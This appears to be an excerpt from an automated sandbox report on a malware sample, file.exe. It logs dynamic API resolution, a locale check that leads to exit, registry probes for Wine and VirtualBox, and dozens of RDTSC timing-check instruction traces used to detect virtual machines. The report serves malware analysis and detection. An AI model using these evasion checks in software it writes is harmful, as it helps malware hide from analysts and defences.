                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E79BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E79BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37989
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E297 second address: 114E2B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E2B4 second address: 114E2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F9EA509B5D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C529A second address: 12C52B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F9EA4BB43C6h 0x0000000a jmp 00007F9EA4BB43D2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C80F4 second address: 12C80F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C80F9 second address: 12C8140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sbb di, A5B8h 0x00000012 push 00000000h 0x00000014 mov di, 743Bh 0x00000018 push 4148EF0Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F9EA4BB43D8h 0x00000025 jmp 00007F9EA4BB43CEh 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8255 second address: 12C8271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9EA509B5E1h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8271 second address: 12C8288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA4BB43D3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8288 second address: 12C828C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C828C second address: 12C82DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov esi, dword ptr [ebp+122D370Ah] 0x0000000f push 00000000h 0x00000011 mov ecx, dword ptr [ebp+122D39DEh] 0x00000017 call 00007F9EA4BB43C9h 0x0000001c pushad 0x0000001d js 00007F9EA4BB43C8h 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F9EA4BB43D0h 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d pushad 0x0000002e jmp 00007F9EA4BB43D4h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C82DF second address: 12C833D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F9EA509B5D8h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jne 00007F9EA509B5FAh 0x00000016 mov eax, dword ptr [eax] 0x00000018 jns 00007F9EA509B5DEh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007F9EA509B5DCh 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C833D second address: 12C83C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000003h 0x0000000c call 00007F9EA4BB43CAh 0x00000011 jmp 00007F9EA4BB43D3h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F9EA4BB43C8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov ecx, dword ptr [ebp+122D38C2h] 0x00000039 push 00000003h 0x0000003b or si, 1D12h 0x00000040 call 00007F9EA4BB43C9h 0x00000045 push eax 0x00000046 js 00007F9EA4BB43CCh 0x0000004c jns 00007F9EA4BB43C6h 0x00000052 pop eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push ecx 0x00000057 jne 00007F9EA4BB43C6h 0x0000005d pop ecx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C83C1 second address: 12C83C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C83C7 second address: 12C843B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 jc 00007F9EA4BB43C6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007F9EA4BB43D5h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 jmp 00007F9EA4BB43D8h 0x0000002e pop eax 0x0000002f jnl 00007F9EA4BB43CCh 0x00000035 lea ebx, dword ptr [ebp+1244E005h] 0x0000003b js 00007F9EA4BB43CAh 0x00000041 mov dx, A371h 0x00000045 clc 0x00000046 xchg eax, ebx 0x00000047 push ecx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C843B second address: 12C844A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C844A second address: 12C844E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C844E second address: 12C8458 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9EA509B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C84E7 second address: 12C8517 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9EA4BB43C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F9EA4BB43D9h 0x00000015 jo 00007F9EA4BB43C6h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8517 second address: 12C8521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F9EA509B5D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8521 second address: 12C856D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 pushad 0x00000011 jmp 00007F9EA4BB43D3h 0x00000016 jp 00007F9EA4BB43C6h 0x0000001c popad 0x0000001d pop ebx 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jno 00007F9EA4BB43C6h 0x00000029 jmp 00007F9EA4BB43CDh 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C856D second address: 12C858B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9EA509B5DCh 0x00000008 jnp 00007F9EA509B5D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F9EA509B5D8h 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C858B second address: 12C85D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a add dword ptr [ebp+122D1A8Eh], eax 0x00000010 push 00000003h 0x00000012 jmp 00007F9EA4BB43CDh 0x00000017 push 00000000h 0x00000019 mov edx, dword ptr [ebp+122D389Eh] 0x0000001f push 00000003h 0x00000021 mov edi, esi 0x00000023 call 00007F9EA4BB43C9h 0x00000028 push ecx 0x00000029 push ecx 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c pop ecx 0x0000002d pop ecx 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jg 00007F9EA4BB43C8h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C85D6 second address: 12C8649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e jo 00007F9EA509B5E1h 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007F9EA509B5DFh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 je 00007F9EA509B5D8h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e pushad 0x0000002f push ecx 0x00000030 jmp 00007F9EA509B5E6h 0x00000035 pop ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 jp 00007F9EA509B5D6h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8649 second address: 12C8665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov esi, ebx 0x0000000a lea ebx, dword ptr [ebp+1244E010h] 0x00000010 mov edi, dword ptr [ebp+122D398Ah] 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8665 second address: 12C8669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8669 second address: 12C8673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8673 second address: 12C8677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8677 second address: 12C869E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F9EA4BB43D9h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C869E second address: 12C86A8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9EA509B5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA3FD second address: 12DA407 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA407 second address: 12DA411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F9EA509B5D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E894C second address: 12E895F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9EA4BB43C6h 0x00000008 jl 00007F9EA4BB43C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E895F second address: 12E896A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9EA509B5D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E896A second address: 12E8972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8972 second address: 12E8976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8ACC second address: 12E8AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8AD3 second address: 12E8AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8AD9 second address: 12E8ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8F74 second address: 12E8F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8F78 second address: 12E8F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8F80 second address: 12E8F9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E6h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8F9B second address: 12E8FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F9EA4BB43CEh 0x00000014 jng 00007F9EA4BB43C6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F9EA4BB43CEh 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9264 second address: 12E926F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9EA509B5D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E926F second address: 12E92A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9EA4BB43D5h 0x0000000a jmp 00007F9EA4BB43CAh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F9EA4BB43C6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E92A3 second address: 12E92A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E958F second address: 12E95A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9B2E second address: 12E9B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8473 second address: 12B847B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA264 second address: 12EA268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA268 second address: 12EA28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F9EA4BB43CEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA28A second address: 12EA290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA290 second address: 12EA298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA298 second address: 12EA2A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F9EA509B5DCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA3CD second address: 12EA3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA3D1 second address: 12EA3D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA3D7 second address: 12EA3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ECE26 second address: 12ECE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 jng 00007F9EA509B5DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ECE37 second address: 12ECE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a jmp 00007F9EA4BB43D5h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ECE59 second address: 12ECE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 jmp 00007F9EA509B5DAh 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F9EA509B5DCh 0x0000001b js 00007F9EA509B5D6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F0EB6 second address: 12F0EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ACA0C second address: 12ACA11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ACA11 second address: 12ACA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6F77 second address: 12F6F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6F7B second address: 12F6F9C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9EA4BB43C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F9EA4BB43EEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9EA4BB43CBh 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F710C second address: 12F7126 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9EA509B5E2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7126 second address: 12F712E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F712E second address: 12F7134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F727D second address: 12F7283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7283 second address: 12F7287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7409 second address: 12F7411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7411 second address: 12F742A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA509B5E5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F773D second address: 12F7745 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F78B0 second address: 12F78B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7A1C second address: 12F7A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9BE6 second address: 12F9C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9EA509B5D6h 0x0000000a popad 0x0000000b popad 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F9EA509B5D8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D26C1h], ebx 0x0000002d push 832DA66Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F9EA509B5E6h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9C34 second address: 12F9C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA4BB43CBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9E7F second address: 12F9E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9E84 second address: 12F9E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9E8A second address: 12F9E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA064 second address: 12FA069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
